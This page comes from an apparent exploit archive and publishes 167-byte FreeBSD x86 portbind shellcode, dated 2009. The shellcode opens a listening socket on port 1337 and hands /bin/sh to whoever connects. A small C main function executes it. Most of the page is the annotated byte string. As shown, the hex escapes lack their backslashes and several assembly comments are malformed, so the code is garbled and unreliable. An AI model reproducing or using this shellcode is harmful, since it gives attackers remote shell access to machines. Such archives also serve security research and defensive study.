freebsd/x86 portbind shellcode 167 bytes

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : freebsd/x86 portbind shellcode 167 bytes
# Published : 2009-12-24
# Author : sbz
# Previous Title : linux/x86 unlink(/etc/passwd) & exit() 35 bytes
# Next Title : Win32 XP SP3 ShellExecuteA shellcode

/*-
 * Copyright (c) 2009, Sofian Brabez <sbz@6dev.net>
 *
 * freebsd-x86-portbind.c - FreeBSD x86 portbind a shell (/bin/sh) on
1337 (x05x39) 167 bytes
 */

const char shellcode[] =
	"x6ax00" 					// push   $0x0
	"x6ax01" 					// push   $0x1
	"x6ax02" 					// push   $0x2
	"x50" 						// push   %eax
	"x6ax61" 					// push   $0x61
	"x58" 						// pop    %eax
	"xcdx80" 					// int    $0x80
	"x50" 						// push   %eax
	"x6ax00" 					// push   $0x0
	"x6ax00" 					// push   $0x0
	"x6ax00" 					// push   $0x0
	"x6ax00" 					// push   $0x0
	"x68x10x02x05x39" 		// push   $0x39050210
	"x89xe0" 					// mov    %esp,%eax
	"x6ax10" 					// push   $0x10
	"x50" 						// push   %eax
	"xffx74x24x1c" 			// pushl  0x1c(%esp)
	"x50" 						// push   %eax
	"x6ax68" 					// push   $0x68
	"x58"						// pop    $eax
	"xcdx80" 					// int    $0x80
	"x6ax01"					// push   $0x1
	"xffx74x24x28"			// pushl  0x28(%esp)
	"x50"						// push   %eax
	"x6ax6a"					// push   $0x6a
	"x58"						// pop    $eax
	"xcdx80"					// int    $0x80
	"x83xecx10"				// sub    $0x10,$esp
	"x6ax10"					// push   $0x10
	"x8dx44x24x04"         	// lea    0x4(%esp),%eax
	"x89xe1"					// mov    %esp,%ecx
	"x51"						// push   %ecx
	"x50"						// push   %eax
	"xffx74x24x4c"			// pushl  0x4c(%esp)
	"x50"						// push   %eax
	"x6ax1e"					// push   %0x1e
	"x58"						// pop    %eax
	"xcdx80"					// int    $0x80
	"x50"						// push   %eax
	"xffx74x24x58"			// pushl  0x58(%esp)
	"x50"						// push   %eax
	"x6ax06"					// push   $0x6
	"x58"						// pop    %eax
	"xcdx80"					// int    $0x80
	"x6ax00"					// push   $0x0
	"xffx74x24x0c"			// pushl  0xc(%esp)
	"x50"						// push   %eax
	"x6ax5a"					// push   $0x5a
	"x58"						// pop    %eax
	"xcdx80"					// int    $0x80
	"x6ax01"					// push   $0x1
	"xffx74x24x18"			// pushl  0x18(%esp)
	"x50"						// push   %eax
	"x6ax5a"					// push   $0x5a
	"x58"						// pop    %eax
	"xcdx80"					// int    $0x80
	"x6ax02"					// push   $0x2
	"xffx74x24x24"			// pushl  0x24(%esp)
	"x50"						// push   %eax
	"x6ax5a"					// push   $0x5a
	"x58"						// pop    %eax
	"xcdx80"					// int    $0x80
	"x68x73x68x00x00"		// push   $0x6873
	"x89xe0"					// mov    %esp,%eax
	"x68x2dx69x00x00"		// push   $0x692d
	"x89xe1"					// mov    %esp,%ecx
	"x6ax00"					// push   $0x0
	"x51"						// push   %ecx
	"x50"						// push   %eax
	"x68x2fx73x68x00"		// push   $0x68732f
	"x68x2fx62x69x6e"		// push   $0x6e69622f
	"x89xe0"					// mov    %esp,%eax
	"x8dx4cx24x08"			// lea    0x8(%esp),%ecx
	"x6ax00"					// push   $0x0
	"x51"						// push   %ecx
	"x50"						// push   %eax
	"x50"						// push   %eax
	"x6ax3b"					// push   $0x3b
	"x58"						// pop    %eax
	"xcdx80";					// int    $0x80

int main(void) {
    void (*egg)() = (void *)shellcode;

    return (*(int(*)())shellcode)();
}